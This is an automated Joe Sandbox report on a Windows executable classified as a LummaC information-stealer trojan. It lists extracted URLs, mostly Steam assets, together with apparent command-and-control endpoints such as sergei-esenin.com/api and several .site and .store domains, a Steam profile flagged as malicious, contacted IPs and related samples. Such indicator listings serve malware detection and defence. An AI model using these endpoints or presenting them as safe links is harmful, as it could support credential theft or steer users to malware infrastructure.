                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&ampfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;lfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamfile.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.1808609124.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://sergei-esenin.com:443/apifile.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    https://sergei-esenin.com/kfile.exe, 00000000.00000002.1972941186.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D82000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/about/file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.cloudflare.com/learning/access-management/file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DE6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://help.steampowered.com/en/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://steamcommunity.com/market/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://store.steampowered.com/news/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://spirittunek.store:443/apii%file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://steamcommunity.com/?subsectionfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://dissapoiznw.store:443/apifile.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://steamcommunity.com/Nfile.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://store.steampowered.com/stats/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://sergei-esenin.com/apiFfile.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmptrueunknown
                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://community.akamai.steamfile.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://store.steampowered.com/legal/file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://licendfilteo.site/apifile.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://clearancek.site:443/api=file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://steamcommunity.com/profiles/76561199724331900/inventoryfile.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmptrue
                                    		unknown
                                    http://upx.sf.netAmcache.hve.4.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://store.steampowered.com/file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valMrfile.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://clearancek.site/apinfile.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://sergei-esenin.com/llfile.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown
                                          https://clearancek.site:443/apiifile.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://community.akamai.steamstatic.com/publdqfile.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://store.steampowered.com/mobilefile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://steamcommunity.com/file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DC9000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • URL Reputation: malware
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.102.49.254
                                                  		steamcommunity.comUnited States
                                                  		16625AKAMAI-ASUStrue
                                                  172.67.206.204
                                                  		sergei-esenin.comUnited States
                                                  		13335CLOUDFLARENETUStrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1532867
                                                  Start date and time:2024-10-14 03:56:05 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 3s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:file.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@3/5@10/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  21:57:08API Interceptor5x Sleep call for process: file.exe modified
                                                  21:57:26API Interceptor1x Sleep call for process: WerFault.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                  • www.valvesoftware.com/legal.htm
                                                  172.67.206.204file.exeGet hashmaliciousLummaCBrowse
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                        SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                          SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                    file.exeGet hashmaliciousLummaCBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.53.8
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.53.8
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.53.8
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.53.8
                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.53.8
                                                                      steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254
                                                                      SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.102.49.254

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      rPayment_slip.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.53.8
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.206.204
                                                                      https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                      • 1.1.1.1
                                                                      http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                      • 162.247.243.29
                                                                      SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.20.86.8
